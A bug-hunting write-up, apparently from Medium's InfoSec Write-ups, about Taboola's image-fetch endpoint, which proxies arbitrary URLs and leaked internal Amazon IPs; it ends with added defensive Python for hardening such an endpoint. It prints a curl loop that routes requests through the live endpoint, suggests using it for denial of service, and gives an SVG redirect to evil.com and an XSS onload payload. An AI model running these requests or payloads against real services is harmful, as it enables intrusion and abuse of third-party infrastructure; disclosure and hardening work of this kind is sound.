InfoSec Write-ups – Medium
I usually read security news every day, and one of the websites I read is ZDNet. At the bottom of each page there is a space for recommended ads served by Taboola.

As a security enthusiast, I always take a look wherever I can 😁
Just right-click on an ad's picture and use Inspect Element, and you find a juicy endpoint that fetches pictures through the Taboola CDN:
https://images.taboola.com/taboola/image/fetch/
If you append an external image URL to this endpoint, the Taboola server fetches, processes and displays the picture. Taboola doesn't check whether the image comes from its own CDN or not!
I wondered what would happen if I made Taboola send a request to my server through this endpoint, so I did it and found Taboola's internal IPs.
I prepared my server with the following command to listen on port 8000:
python -m SimpleHTTPServer 8000
and from my PC sent multiple requests through the endpoint with the following loop:
for number in {1..100}
do curl -i https://images.taboola.com/taboola/image/fetch/http://SERVER_IP:8000/$number
done
and the responses were amazing!!!
Taboola uses the Fastly CDN, and whenever you ping images.taboola.com you receive the following response:
ping images.taboola.com
PING tls13.taboola.map.fastly.net (151.101.193.44) 56(84) bytes of data.
But in my server logs I found internal IPs from Amazon!!!

So, with this juicy endpoint you can run a DoS attack on behalf of the Taboola servers.
In addition, these servers had ports 22 and 80 open, and one of them had two CVEs.

Maybe you've thought: this endpoint processes images, so maybe it accepts SVG images 😉
Find an SVG image and open it in a text editor. Add the following code and upload it somewhere on the Internet.

Finally, we have this link:
https://images.taboola.com/taboola/image/fetch/https://www.linkpicture.com/q/dog.svg
Unfortunately, the endpoint doesn't process SVG images properly and the browser downloads the file instead, but if you use Chrome or IE and click on the downloaded image to open it, you are redirected to evil.com.
You can change the payload in the SVG file to the following code to execute XSS:
onload='alert("XSS")'
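As an added example (not code from the original write-up and not Taboola's own implementation), this is how a defender would harden an image-fetch endpoint like the one above: only proxy from an allowlist of image origins, verify the bytes against the declared raster type instead of trusting headers, reject SVG outright, and serve the result with headers that stop the browser from reinterpreting it. The hostnames and size limit are constructed assumptions.

```python
from typing import Dict, Tuple
from urllib.parse import urlparse

# Origins the proxy may fetch from (constructed values, not a real configuration).
ALLOWED_IMAGE_HOSTS = {"cdn.example-ads.net", "img.example-publisher.com"}

# Raster formats only. SVG is XML and can carry script or a redirect, so it is
# not in this set and is refused rather than sniffed or "processed".
MAGIC = {
    "image/jpeg": b"\xff\xd8\xff",
    "image/png": b"\x89PNG\r\n\x1a\n",
    "image/gif": b"GIF8",
    "image/webp": b"RIFF",
}
MAX_BYTES = 5 * 1024 * 1024  # assumed upper bound for a single ad image


def validate_fetch_url(url: str) -> Tuple[bool, str]:
    """Decide whether the proxy may fetch this URL on a visitor's behalf."""
    parsed = urlparse(url)
    if parsed.scheme != "https":
        return False, "only https upstreams are allowed"
    host = (parsed.hostname or "").lower()
    if host not in ALLOWED_IMAGE_HOSTS:
        return False, f"host {host!r} is not an allowed image origin"
    if parsed.port not in (None, 443):
        return False, "non-standard upstream port refused"
    return True, "ok"


def classify_image(body: bytes, declared_type: str) -> Tuple[bool, str]:
    """Accept only if the declared type is a raster type AND the bytes match it."""
    declared = declared_type.split(";")[0].strip().lower()
    if declared not in MAGIC:
        return False, f"content type {declared!r} is not served by this endpoint"
    if len(body) > MAX_BYTES:
        return False, "image exceeds size limit"
    if not body.startswith(MAGIC[declared]):
        return False, "body does not match the declared image type"
    return True, declared


def response_headers(content_type: str) -> Dict[str, str]:
    """Headers for the proxied bytes: no sniffing, no script, inline only."""
    return {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "inline",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
```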
I found these bugs on Taboola and emailed the support team in March 2020. They haven't responded to me yet!
"A juicy endpoint on the Taboola leads to reveal internal IPs and XSS" was originally published in InfoSec Write-ups on Medium.